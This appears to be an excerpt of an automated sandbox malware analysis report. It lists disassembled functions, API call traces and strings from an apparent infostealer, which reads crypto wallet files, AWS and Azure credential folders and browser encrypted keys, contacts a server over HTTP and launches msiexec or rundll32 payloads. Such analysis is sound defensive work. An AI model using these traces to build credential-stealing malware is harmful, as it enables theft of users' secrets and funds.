                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: b91b379820d5b23510116f1d115c2ed3e058fb1df357fc9f278f61a4acba7700
                              • Instruction ID: 5e54fc75ad3bdef7b38456fd5e234152137e04fe795a4c7e0d28080c44aa6f5b
                              • Opcode Fuzzy Hash: b91b379820d5b23510116f1d115c2ed3e058fb1df357fc9f278f61a4acba7700
                              • Instruction Fuzzy Hash: B5E11071910104AFCB24EBA1DDD6EEE7378AF18301F14416AF507B7092DE35AA09DFA2
                              Function 00C5C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007FD548,00000000,?,00C7144C,00000000,?,?), ref: 00C5CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C5CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C5CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C5CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C5CAD9
                              • StrStrA.SHLWAPI(?,007FD560,00C70B52), ref: 00C5CAF7
                              • StrStrA.SHLWAPI(00000000,007FD590), ref: 00C5CB1E
                              • StrStrA.SHLWAPI(?,007FDC40,00000000,?,00C71458,00000000,?,00000000,00000000,?,007F9188,00000000,?,00C71454,00000000,?), ref: 00C5CCA2
                              • StrStrA.SHLWAPI(00000000,007FDDA0), ref: 00C5CCB9
                                • Part of subcall function 00C5C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C5C871
                                • Part of subcall function 00C5C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C5C87C
                              • StrStrA.SHLWAPI(?,007FDDA0,00000000,?,00C7145C,00000000,?,00000000,007F9278), ref: 00C5CD5A
                              • StrStrA.SHLWAPI(00000000,007F90C8), ref: 00C5CD71
                                • Part of subcall function 00C5C820: lstrcat.KERNEL32(?,00C70B46), ref: 00C5C943
                                • Part of subcall function 00C5C820: lstrcat.KERNEL32(?,00C70B47), ref: 00C5C957
                                • Part of subcall function 00C5C820: lstrcat.KERNEL32(?,00C70B4E), ref: 00C5C978
                              • lstrlen.KERNEL32(00000000), ref: 00C5CE44
                              • CloseHandle.KERNEL32(00000000), ref: 00C5CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 52797d0476c5b4c977346e6e9b29ada1723e84ad4985780e0f5af20c54c8f7e7
                              • Instruction ID: 748c76015661a527460e81f74d8be13b7ee307153c7b40e0fd7679ad4b55bcdd
                              • Opcode Fuzzy Hash: 52797d0476c5b4c977346e6e9b29ada1723e84ad4985780e0f5af20c54c8f7e7
                              • Instruction Fuzzy Hash: 5CE10C71810108AFDB24EBA4DC96FEEB778AF18300F54416AF50677191EF306A4ADFA1
                              Function 00C68320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • RegOpenKeyExA.ADVAPI32(00000000,007FB188,00000000,00020019,00000000,00C705B6), ref: 00C683A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C68426
                              • wsprintfA.USER32 ref: 00C68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C68499
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 919814ea2dc7f456926228c88834ca99e5b573a1e8170ea1dc740b8f51291899
                              • Instruction ID: 1d59adbbcd9b5676d42221ae1616b211c206ef65a0893d544600bbf82462d0d2
                              • Opcode Fuzzy Hash: 919814ea2dc7f456926228c88834ca99e5b573a1e8170ea1dc740b8f51291899
                              • Instruction Fuzzy Hash: 4F81DC71910118AFDB24DB55CD95FEAB7B8FF48700F108299E109A6190DF71AB89CFD1
                              Function 00C64D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00C64DCD
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C6492C
                                • Part of subcall function 00C64910: FindFirstFileA.KERNEL32(?,?), ref: 00C64943
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00C64E59
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FDC), ref: 00C64971
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FE0), ref: 00C64987
                                • Part of subcall function 00C64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C64B7D
                                • Part of subcall function 00C64910: FindClose.KERNEL32(000000FF), ref: 00C64B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C64EE5
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C649B0
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C708D2), ref: 00C649C5
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C649E2
                                • Part of subcall function 00C64910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C64A1E
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,007FE748), ref: 00C64A4A
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,00C70FF8), ref: 00C64A5C
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,?), ref: 00C64A70
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,00C70FFC), ref: 00C64A82
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,?), ref: 00C64A96
                                • Part of subcall function 00C64910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C64AAC
                                • Part of subcall function 00C64910: DeleteFileA.KERNEL32(?), ref: 00C64B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 1fe76d7e30c854b2fcbe215beec08fb20b8d5aa0e1c47d8d4cd3574a3b056b9e
                              • Instruction ID: 448d1ade230c18d61f59926a3f89f9df7f794b5c981af556beade1e2bf34d6a7
                              • Opcode Fuzzy Hash: 1fe76d7e30c854b2fcbe215beec08fb20b8d5aa0e1c47d8d4cd3574a3b056b9e
                              • Instruction Fuzzy Hash: 2D41857A9502086BDB24F770DC8BFED7338AB64700F448465B949660C1EEB45BCD9B92
                              Function 00C69010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C6906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 34ac8494ed9b39dfec9361e14e64ec4fbb9753fefef7fc2557868223d28757b6
                              • Instruction ID: 7b51188ec88d38e2af1279057ef9a459cb4416fd21c2756ec437a371f4677d05
                              • Opcode Fuzzy Hash: 34ac8494ed9b39dfec9361e14e64ec4fbb9753fefef7fc2557868223d28757b6
                              • Instruction Fuzzy Hash: AF71EAB5910208AFDB14DFE5DC89FEEB7B8EF48300F14851AF515A7290DB34A949CBA1
                              Function 00C62E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C631C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C6335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C634EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 247ff6d57e7c7db7be24a7abddc645788f80b474aa975990995abc6032f54298
                              • Instruction ID: fe138317acde8d4b22f5784e53033d047b11c6d5e3ff87e1d6388ef7bea87766
                              • Opcode Fuzzy Hash: 247ff6d57e7c7db7be24a7abddc645788f80b474aa975990995abc6032f54298
                              • Instruction Fuzzy Hash: 0A12DB718101089ADB29EFA0DDD2FEEB778AF18300F504169E50677191EF746B4ADFA2
                              Function 00C652C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C56280: InternetOpenA.WININET(00C70DFE,00000001,00000000,00000000,00000000), ref: 00C562E1
                                • Part of subcall function 00C56280: StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56303
                                • Part of subcall function 00C56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C56335
                                • Part of subcall function 00C56280: HttpOpenRequestA.WININET(00000000,GET,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C56385
                                • Part of subcall function 00C56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C563BF
                                • Part of subcall function 00C56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C563D1
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65318
                              • lstrlen.KERNEL32(00000000), ref: 00C6532F
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00C65364
                              • lstrlen.KERNEL32(00000000), ref: 00C65383
                              • lstrlen.KERNEL32(00000000), ref: 00C653AE
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 52d1f60afdd3cd356d06d63d55215b3969fb749652e31469329ef6ae836dd80d
                              • Instruction ID: 7afebc953b8a551b1978888b65528cec6af9dd4e92a13855933e28727ab4f624
                              • Opcode Fuzzy Hash: 52d1f60afdd3cd356d06d63d55215b3969fb749652e31469329ef6ae836dd80d
                              • Instruction Fuzzy Hash: 6E51FE309101489BCB24FFA5CDD6AED7779AF14301F504029F90A6B592EF346B49EFA2
                              Function 00C612D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: c8314c45f606ac05b3112424eecee8c3fb155b690c98deb4fbe1641e300a9956
                              • Instruction ID: e7bb1d3d9a3777aedec050bf62fb29b3f8dbf7e4a4efac2d6b5cfa965e7f5135
                              • Opcode Fuzzy Hash: c8314c45f606ac05b3112424eecee8c3fb155b690c98deb4fbe1641e300a9956
                              • Instruction Fuzzy Hash: 88C198B59002199BCB24EF60DCD9FEE7378BF64304F044599F50AA7142DB70AA89DFA1
                              Function 00C64280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C642EC
                              • lstrcat.KERNEL32(?,007FE410), ref: 00C6430B
                              • lstrcat.KERNEL32(?,?), ref: 00C6431F
                              • lstrcat.KERNEL32(?,007FD488), ref: 00C64333
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C68D90: GetFileAttributesA.KERNEL32(00000000,?,00C51B54,?,?,00C7564C,?,?,00C70E1F), ref: 00C68D9F
                                • Part of subcall function 00C59CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C59D39
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C693C0: GlobalAlloc.KERNEL32(00000000,00C643DD,00C643DD), ref: 00C693D3
                              • StrStrA.SHLWAPI(?,007FE1B8), ref: 00C643F3
                              • GlobalFree.KERNEL32(?), ref: 00C64512
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59AEF
                                • Part of subcall function 00C59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C54EEE,00000000,?), ref: 00C59B01
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59B2A
                                • Part of subcall function 00C59AC0: LocalFree.KERNEL32(?,?,?,?,00C54EEE,00000000,?), ref: 00C59B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00C644A3
                              • StrCmpCA.SHLWAPI(?,00C708D1), ref: 00C644C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C644D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00C644E5
                              • lstrcat.KERNEL32(00000000,00C70FB8), ref: 00C644F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
